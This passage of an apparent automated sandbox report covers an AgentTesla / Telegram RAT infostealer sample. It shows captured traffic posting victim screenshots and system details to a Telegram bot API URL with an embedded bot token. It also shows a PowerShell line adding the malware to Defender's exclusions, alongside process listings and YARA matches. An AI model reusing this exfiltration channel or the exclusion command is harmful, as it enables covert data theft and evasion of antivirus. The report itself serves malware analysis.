2025-01-10 15:57:52 UTC	16355	OUT	Data Raw: 4b 49 40 05 14 51 40 05 14 51 4c 62 51 4b 49 40 05 14 51 40 05 14 51 40 05 25 2d 25 03 0a 28 a2 80 0a 28 a2 80 12 8a 28 a0 02 8a 28 a0 61 49 4b 45 00 25 14 51 40 05 14 51 4c 62 51 4b 45 00 25 14 b4 94 00 94 52 d2 50 01 45 14 53 18 52 52 d1 40 09 45 2d 25 00 14 51 4b 40 09 45 14 50 31 28 a5 a4 a0 02 8a 28 a6 01 45 14 50 31 28 a2 8a 00 28 a2 8a 00 4c 51 4b 45 30 12 8a 5c 51 40 c4 a2 96 8a 04 20 eb 5a 77 3f eb 8f d0 7f 2a cd 1d 6b 4e eb fd 71 fa 0f e5 59 4f e2 40 b7 21 a2 8a 28 34 0a 4a 5a 28 18 52 52 d1 40 09 45 14 50 01 45 14 b4 00 94 94 b4 50 01 45 2d 25 00 32 5f f8 f7 97 fd da ad 67 fe b1 be 95 66 6f f8 f7 97 fd da ad 65 fe b1 be 94 d6 cc 0b 94 b4 51 8a 40 25 14 b8 a3 14 82 e2 62 96 97 14 62 8b 85 c4 c5 14 b8 a3 14 5c 57 13 14 53 b0 7d 29 76 9f 4a 2e 17 Data Ascii: KI@Q@QLbQKI@Q@Q@%-%((((aIKE%Q@QLbQKE%RPESRR@E-%QK@EP1((EP1((LQKE0\Q@ Zw?*kNqYO@!(4JZ(RR@EPEPE-%2_gfoeQ@%bb\WS})vJ.
2025-01-10 15:57:52 UTC	7668	OUT	Data Raw: 54 95 d1 46 1e ce 0a 2f a1 c3 5e a2 ab 51 cd 75 2a 49 71 1d b4 56 b7 32 c9 72 1e 0d 42 49 23 8e 14 04 48 42 21 da cc 48 da 3d f0 7b d3 12 39 be c9 fd 9a 6f a1 13 b5 a9 90 db 05 93 7f da 0f ef 00 ce dd bf 77 0b f7 aa c1 b5 88 cc 65 2b f3 9e f4 c3 63 6c 51 94 c6 30 dd 6b 92 78 49 4a 4e 49 9e 95 3c c6 30 82 83 8d ec 85 b7 8e f0 ea 3a 5d d3 41 38 b7 75 b2 c4 be 59 d8 4e 13 3f 36 31 d6 aa db ce 4c 96 af 66 5e 2b 61 25 ca 83 70 e0 b4 57 25 4e cc b6 00 0a 70 a5 4e 07 39 ce 71 53 2e 99 6a aa 55 54 85 3d a9 4e 9d 6a 40 1e 5f 4a 99 60 e7 2e bd ff 00 12 e3 98 d3 8b 6d 47 7b 7e 0a c4 56 d0 4b 6a da 68 9d 6e ed ee e6 6b 88 8c 57 24 28 66 31 61 58 02 06 32 cc 06 72 7a 75 a4 81 a7 b1 8f 4e b7 bb 0d 6d 74 f2 5c 3c 62 61 b3 61 31 85 8d 9b 3f 74 6f 1c 13 e9 9a 98 69 b6 a3 Data Ascii: TF/^Qu*IqV2rBI#HB!H={9owe+clQ0kxIJNI<0:]A8uYN?61Lf^+a%pW%NpN9qS.jUT=Nj@_J`.mG{~VKjhnkW$(f1aX2rzuNmt\<baa1?toi
2025-01-10 15:57:52 UTC	50	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 33 31 36 35 61 30 32 35 36 39 33 39 2d 2d 0d 0a Data Ascii: -----------------------------8dd3165a0256939--
2025-01-10 15:57:53 UTC	1512	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 10 Jan 2025 15:57:53 GMT Content-Type: application/json Content-Length: 1123 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":true,"result":{"message_id":201798,"from":{"id":6224217116,"is_bot":true,"first_name":"chacha2023","username":"chacha1_bot"},"chat":{"id":1376739206,"first_name":"Chacha","last_name":"1","username":"chacha1000000","type":"private"},"date":1736524673,"document":{"file_name":"user-642294 2025-01-10 10-57-50.jpg","mime_type":"image/jpeg","thumbnail":{"file_id":"AAMCBAADGQMAAQMURmeBQ4DAMJPaGJXyJTg5ujbAjWQOAAI_HQACuyoJUEavH5ZzE_ZUAQAHbQADNgQ","file_unique_id":"AQADPx0AArsqCVBy","file_size":10551,"width":320,"height":256},"thumb":{"file_id":"AAMCBAADGQMAAQMURmeBQ4DAMJPaGJXyJTg5ujbAjWQOAAI_HQACuyoJUEavH5ZzE_ZUAQAHbQADNgQ","file_unique_id":"AQADPx0AArsqCVBy","file_size":10551,"width":320,"height":256},"file_id":"BQACAgQAAxkDAAEDFEZngUOAwDCT2hiV8iU4Obo2wI1kDgACPx0AArsqCVBGrx-WcxP2VDYE","file_unique_id":"AgADPx0AArsqCVA","file_size":57184},"caption":"New SC Recovered!\n\nTime: 01/10/2025 10:57:50\nUser Name: user/642294\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8 [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port
29	192.168.2.5	50014	149.154.167.220	443

Timestamp	Bytes transferred	Direction	Data
2025-01-10 15:57:52 UTC	262	OUT	POST /bot6224217116:AAGNvwYwFGJq74My50AttE7zm5CocLNeufI/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8dd3165a0387c77 Host: api.telegram.org Content-Length: 57807 Expect: 100-continue Connection: Keep-Alive
2025-01-10 15:57:52 UTC	25	IN	HTTP/1.1 100 Continue
2025-01-10 15:57:52 UTC	1024	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 33 31 36 35 61 30 33 38 37 63 37 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 33 37 36 37 33 39 32 30 36 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 33 31 36 35 61 30 33 38 37 63 37 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 31 2f 31 30 2f 32 30 32 35 20 31 30 3a 35 37 3a 35 30 0a 55 73 65 72 Data Ascii: -----------------------------8dd3165a0387c77Content-Disposition: form-data; name="chat_id"1376739206-----------------------------8dd3165a0387c77Content-Disposition: form-data; name="caption"New SC Recovered!Time: 01/10/2025 10:57:50User
2025-01-10 15:57:52 UTC	16355	OUT	Data Raw: 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 73 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22 a5 87 9c 7c ca 14 Data Ascii: !1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFshU9oM4UofORx?"\|
2025-01-10 15:57:52 UTC	16355	OUT	Data Raw: 9d 14 0c 4c 52 52 f4 a3 14 00 94 71 4b 49 40 c2 92 9d f8 52 50 02 51 45 1d a9 0c 4a 28 fc 28 a0 04 14 94 ea 4a 43 12 8f ad 2d 25 00 1f 5a 28 a3 f1 a0 67 4b 45 14 56 47 88 14 51 48 cc ab d4 d4 ca 71 82 bc 9d 91 74 e9 4e ac b9 69 a6 df 96 a2 d1 4c f3 57 de 94 48 87 be 3e b5 8c 71 74 24 ec a6 8e c9 e5 98 ca 71 e6 95 27 6f 41 d4 52 d1 5d 07 00 94 51 45 00 14 51 41 20 0c 9e 05 00 b5 0a 2a 0f b5 db 8f f9 69 fa 1a 3e d7 6f ff 00 3d 3f 43 5c ff 00 5a a1 fc eb ef 47 7f f6 66 3b fe 7c cf ff 00 01 7f e4 4f 45 41 f6 bb 7f f9 e9 fa 1a 99 19 5d 43 29 c8 3d eb 48 56 a7 51 da 12 4f d1 98 d6 c1 e2 28 2e 6a d4 e5 15 e6 9a fc c5 a2 8a 2b 53 98 28 a2 8a 00 4a 29 68 a0 61 45 14 52 10 51 45 14 00 94 51 45 03 0a 28 a2 98 05 25 2d 25 00 14 51 45 03 0a 28 a2 80 0a 28 a2 80 0a 28 Data Ascii: LRRqKI@RPQEJ((JC-%Z(gKEVGQHqtNiLWH>qt$q'oAR]QEQA *i>o=?C\ZGf;\|OEA]C)=HVQO(.j+S(J)haERQEQE(%-%QE(((
2025-01-10 15:57:52 UTC	16355	OUT	Data Raw: 4b 49 40 05 14 51 40 05 14 51 4c 62 51 4b 49 40 05 14 51 40 05 14 51 40 05 25 2d 25 03 0a 28 a2 80 0a 28 a2 80 12 8a 28 a0 02 8a 28 a0 61 49 4b 45 00 25 14 51 40 05 14 51 4c 62 51 4b 45 00 25 14 b4 94 00 94 52 d2 50 01 45 14 53 18 52 52 d1 40 09 45 2d 25 00 14 51 4b 40 09 45 14 50 31 28 a5 a4 a0 02 8a 28 a6 01 45 14 50 31 28 a2 8a 00 28 a2 8a 00 4c 51 4b 45 30 12 8a 5c 51 40 c4 a2 96 8a 04 20 eb 5a 77 3f eb 8f d0 7f 2a cd 1d 6b 4e eb fd 71 fa 0f e5 59 4f e2 40 b7 21 a2 8a 28 34 0a 4a 5a 28 18 52 52 d1 40 09 45 14 50 01 45 14 b4 00 94 94 b4 50 01 45 2d 25 00 32 5f f8 f7 97 fd da ad 67 fe b1 be 95 66 6f f8 f7 97 fd da ad 65 fe b1 be 94 d6 cc 0b 94 b4 51 8a 40 25 14 b8 a3 14 82 e2 62 96 97 14 62 8b 85 c4 c5 14 b8 a3 14 5c 57 13 14 53 b0 7d 29 76 9f 4a 2e 17 Data Ascii: KI@Q@QLbQKI@Q@Q@%-%((((aIKE%Q@QLbQKE%RPESRR@E-%QK@EP1((EP1((LQKE0\Q@ Zw?*kNqYO@!(4JZ(RR@EPEPE-%2_gfoeQ@%bb\WS})vJ.
2025-01-10 15:57:52 UTC	7668	OUT	Data Raw: 54 95 d1 46 1e ce 0a 2f a1 c3 5e a2 ab 51 cd 75 2a 49 71 1d b4 56 b7 32 c9 72 1e 0d 42 49 23 8e 14 04 48 42 21 da cc 48 da 3d f0 7b d3 12 39 be c9 fd 9a 6f a1 13 b5 a9 90 db 05 93 7f da 0f ef 00 ce dd bf 77 0b f7 aa c1 b5 88 cc 65 2b f3 9e f4 c3 63 6c 51 94 c6 30 dd 6b 92 78 49 4a 4e 49 9e 95 3c c6 30 82 83 8d ec 85 b7 8e f0 ea 3a 5d d3 41 38 b7 75 b2 c4 be 59 d8 4e 13 3f 36 31 d6 aa db ce 4c 96 af 66 5e 2b 61 25 ca 83 70 e0 b4 57 25 4e cc b6 00 0a 70 a5 4e 07 39 ce 71 53 2e 99 6a aa 55 54 85 3d a9 4e 9d 6a 40 1e 5f 4a 99 60 e7 2e bd ff 00 12 e3 98 d3 8b 6d 47 7b 7e 0a c4 56 d0 4b 6a da 68 9d 6e ed ee e6 6b 88 8c 57 24 28 66 31 61 58 02 06 32 cc 06 72 7a 75 a4 81 a7 b1 8f 4e b7 bb 0d 6d 74 f2 5c 3c 62 61 b3 61 31 85 8d 9b 3f 74 6f 1c 13 e9 9a 98 69 b6 a3 Data Ascii: TF/^Qu*IqV2rBI#HB!H={9owe+clQ0kxIJNI<0:]A8uYN?61Lf^+a%pW%NpN9qS.jUT=Nj@_J`.mG{~VKjhnkW$(f1aX2rzuNmt\<baa1?toi
2025-01-10 15:57:52 UTC	50	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 33 31 36 35 61 30 33 38 37 63 37 37 2d 2d 0d 0a Data Ascii: -----------------------------8dd3165a0387c77--
2025-01-10 15:57:53 UTC	1512	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 10 Jan 2025 15:57:53 GMT Content-Type: application/json Content-Length: 1123 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":true,"result":{"message_id":201799,"from":{"id":6224217116,"is_bot":true,"first_name":"chacha2023","username":"chacha1_bot"},"chat":{"id":1376739206,"first_name":"Chacha","last_name":"1","username":"chacha1000000","type":"private"},"date":1736524673,"document":{"file_name":"user-642294 2025-01-10 10-57-50.jpg","mime_type":"image/jpeg","thumbnail":{"file_id":"AAMCBAADGQMAAQMUR2eBQ4H6a1itcf-bZcyXRxHQouWgAAJAHQACuyoJUOyb376JJ1mjAQAHbQADNgQ","file_unique_id":"AQADQB0AArsqCVBy","file_size":10551,"width":320,"height":256},"thumb":{"file_id":"AAMCBAADGQMAAQMUR2eBQ4H6a1itcf-bZcyXRxHQouWgAAJAHQACuyoJUOyb376JJ1mjAQAHbQADNgQ","file_unique_id":"AQADQB0AArsqCVBy","file_size":10551,"width":320,"height":256},"file_id":"BQACAgQAAxkDAAEDFEdngUOB-mtYrXH_m2XMl0cR0KLloAACQB0AArsqCVDsm9--iSdZozYE","file_unique_id":"AgADQB0AArsqCVA","file_size":57184},"caption":"New SC Recovered!\n\nTime: 01/10/2025 10:57:50\nUser Name: user/642294\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8 [TRUNCATED]

Target ID:	0
Start time:	10:53:40
Start date:	10/01/2025
Path:	C:\Users\user\Desktop\IUqsn1SBGy.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\IUqsn1SBGy.exe"
Imagebase:	0xf90000
File size:	872'968 bytes
MD5 hash:	DD800A9D42C8D41146C3F8F53CCD29F9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000000.00000002.2123371459.0000000004E04000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000000.00000002.2123371459.0000000004B95000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	10:53:43
Start date:	10/01/2025
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\IUqsn1SBGy.exe"
Imagebase:	0xfc0000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	10:53:43
Start date:	10/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	10:53:43
Start date:	10/01/2025
Path:	C:\Users\user\Desktop\IUqsn1SBGy.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\IUqsn1SBGy.exe"
Imagebase:	0x780000
File size:	872'968 bytes
MD5 hash:	DD800A9D42C8D41146C3F8F53CCD29F9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.4520429982.0000000002BD0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.4520429982.0000000002BD0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.4520429982.0000000002C03000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.4520429982.0000000002C0F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000005.00000002.4520429982.0000000002C0F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	6
Start time:	10:53:46
Start date:	10/01/2025
Path:	C:\Windows\System32\wbem\WmiPrvSE.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Imagebase:	0x7ff6ef0c0000
File size:	496'640 bytes
MD5 hash:	60FF40CFD7FB8FE41EE4FE9AE5FE1C51
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	8
Start time:	10:53:56
Start date:	10/01/2025
Path:	C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe"
Imagebase:	0x360000
File size:	872'968 bytes
MD5 hash:	DD800A9D42C8D41146C3F8F53CCD29F9
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000008.00000002.2275950717.0000000003836000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 68%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	10:53:58
Start date:	10/01/2025
Path:	C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe"
Imagebase:	0x220000
File size:	872'968 bytes
MD5 hash:	DD800A9D42C8D41146C3F8F53CCD29F9
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	10:53:58
Start date:	10/01/2025
Path:	C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe"
Imagebase:	0x5b0000
File size:	872'968 bytes
MD5 hash:	DD800A9D42C8D41146C3F8F53CCD29F9
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.4520276581.00000000029C0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000A.00000002.4520276581.00000000029C0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000A.00000002.4520276581.00000000029F3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000A.00000002.4520276581.00000000029FF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000A.00000002.4520276581.00000000029FF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	11
Start time:	10:54:05
Start date:	10/01/2025
Path:	C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe"
Imagebase:	0xc00000
File size:	872'968 bytes
MD5 hash:	DD800A9D42C8D41146C3F8F53CCD29F9
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 0000000B.00000002.2351049969.0000000003FF7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	10:54:06
Start date:	10/01/2025
Path:	C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe"
Imagebase:	0x6a0000
File size:	872'968 bytes
MD5 hash:	DD800A9D42C8D41146C3F8F53CCD29F9
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000C.00000002.4521384104.0000000002AC3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000C.00000002.4521384104.0000000002ACF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000C.00000002.4521384104.0000000002ACF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000002.4521384104.0000000002A90000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000C.00000002.4521384104.0000000002A90000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	13.9%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	1.7%
Total number of Nodes:	180
Total number of Limit Nodes:	12

Executed Functions

Function 0A56ACFC Relevance: 6.9, Strings: 5, Instructions: 623
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Haq, xrefs: 0A56C7BC
Haq, xrefs: 0A56C843
Haq, xrefs: 0A56C729
Haq, xrefs: 0A56C98B
Haq, xrefs: 0A56C8CD

Memory Dump Source

Source File: 00000000.00000002.2129631396.000000000A560000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a560000_IUqsn1SBGy.jbxd

Similarity

API ID:
String ID: Haq$Haq$Haq$Haq$Haq
API String ID: 0-1792267638
Opcode ID: 6acdbfdec0a35a530811ca7f320ebf3b2342034724d3f9cafb7cddefa60439c7
Instruction ID: 09e391acece3decb7a5b4d9968242350d5962a89fd656d6318b64a1ed9f5a180
Opcode Fuzzy Hash: 6acdbfdec0a35a530811ca7f320ebf3b2342034724d3f9cafb7cddefa60439c7
Instruction Fuzzy Hash: B7325F70A002198FDB64DFA9C8507AEBBF2BFC4301F1485AAD449AB399DB349D45CF91

Function 09E32CF8 Relevance: 4.0, Strings: 3, Instructions: 284
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

ry, xrefs: 09E32FC4
ry, xrefs: 09E32FE2
ry, xrefs: 09E32FCB

Memory Dump Source

Source File: 00000000.00000002.2129275115.0000000009E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 09E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e30000_IUqsn1SBGy.jbxd

Similarity

API ID:
String ID: ry$ry$ry
API String ID: 0-128149707
Opcode ID: e84735951ec48533e439121a6d65c1bdff3f7303aff5802390c1e9a2b6e4c969
Instruction ID: 95c7c1e60ab99c9e4c1638503149f8d59090ebfbf08fd5918c877847680cb502
Opcode Fuzzy Hash: e84735951ec48533e439121a6d65c1bdff3f7303aff5802390c1e9a2b6e4c969
Instruction Fuzzy Hash: DEC13770D0560ADFCB04CF95C4899AEFBB2FF88340B91E559D516AB318C734AA42CF95

Function 09E32CE8 Relevance: 4.0, Strings: 3, Instructions: 280
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

ry, xrefs: 09E32FC4
ry, xrefs: 09E32FE2
ry, xrefs: 09E32FCB

Memory Dump Source

Source File: 00000000.00000002.2129275115.0000000009E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 09E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e30000_IUqsn1SBGy.jbxd

Similarity

API ID:
String ID: ry$ry$ry
API String ID: 0-128149707
Opcode ID: c351db9b3ddf6a22977a75e0c759d5e312196569d18cfb8acbe73ccc00899826
Instruction ID: ee5647252cfa418ed046bbfc05bec00ff299e833f364967f7c75ec44d6ff5fc7
Opcode Fuzzy Hash: c351db9b3ddf6a22977a75e0c759d5e312196569d18cfb8acbe73ccc00899826
Instruction Fuzzy Hash: 72C13570D0560ADFCB04CFA5C4899AEFBB2FF88340B91E155D512AB318D734AA82CF91

Function 01770927 Relevance: 4.0, Strings: 3, Instructions: 263
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Te]q, xrefs: 01770F85
MJS, xrefs: 01770FFB
Te]q, xrefs: 017710D2

Memory Dump Source

Source File: 00000000.00000002.2121325778.0000000001770000.00000040.00000800.00020000.00000000.sdmp, Offset: 01770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1770000_IUqsn1SBGy.jbxd

Similarity

API ID:
String ID: MJS$Te]q$Te]q
API String ID: 0-1407380276
Opcode ID: b2b91451db75523643410d62e8d97460434b857663e91d04196ee9512145337b
Instruction ID: 7c88ddaed7dce5a8160cf95e8572ecdb577ec9538c5536fd8094e6ff126daeee
Opcode Fuzzy Hash: b2b91451db75523643410d62e8d97460434b857663e91d04196ee9512145337b
Instruction Fuzzy Hash: A3911231A08256AFDF599F68C84056EFBF2FF87710F18859AF405EB251C671AD01CB92

Function 01770995 Relevance: 4.0, Strings: 3, Instructions: 247
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Te]q, xrefs: 01770F85
MJS, xrefs: 01770FFB
Te]q, xrefs: 017710D2

Memory Dump Source

Source File: 00000000.00000002.2121325778.0000000001770000.00000040.00000800.00020000.00000000.sdmp, Offset: 01770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1770000_IUqsn1SBGy.jbxd

Similarity

API ID:
String ID: MJS$Te]q$Te]q
API String ID: 0-1407380276
Opcode ID: 7ba68e7748449d6f78d817f3c6e3df1c5abb9f6c9c395ba0fedce484d72c776c
Instruction ID: bea721296ff295abfa89ca62389b5d69c21c5781db840945fa4d647794e85a20
Opcode Fuzzy Hash: 7ba68e7748449d6f78d817f3c6e3df1c5abb9f6c9c395ba0fedce484d72c776c
Instruction Fuzzy Hash: 67910231A04256DFCB55CF68C84496EFBF2FF8A210F14869AE005AB361C771AC45CB92

Function 01770A31 Relevance: 4.0, Strings: 3, Instructions: 238
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Te]q, xrefs: 01770F85
MJS, xrefs: 01770FFB
Te]q, xrefs: 017710D2

Memory Dump Source

Source File: 00000000.00000002.2121325778.0000000001770000.00000040.00000800.00020000.00000000.sdmp, Offset: 01770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1770000_IUqsn1SBGy.jbxd

Similarity

API ID:
String ID: MJS$Te]q$Te]q
API String ID: 0-1407380276
Opcode ID: e0332545fb8cd9fd1d7c410072255411251f4528c35d973f3d0bb502d0362a74
Instruction ID: 3cae30e99ee250e73233945c0a86d377bd8b1d51053c712421a6fe7d6a441344
Opcode Fuzzy Hash: e0332545fb8cd9fd1d7c410072255411251f4528c35d973f3d0bb502d0362a74
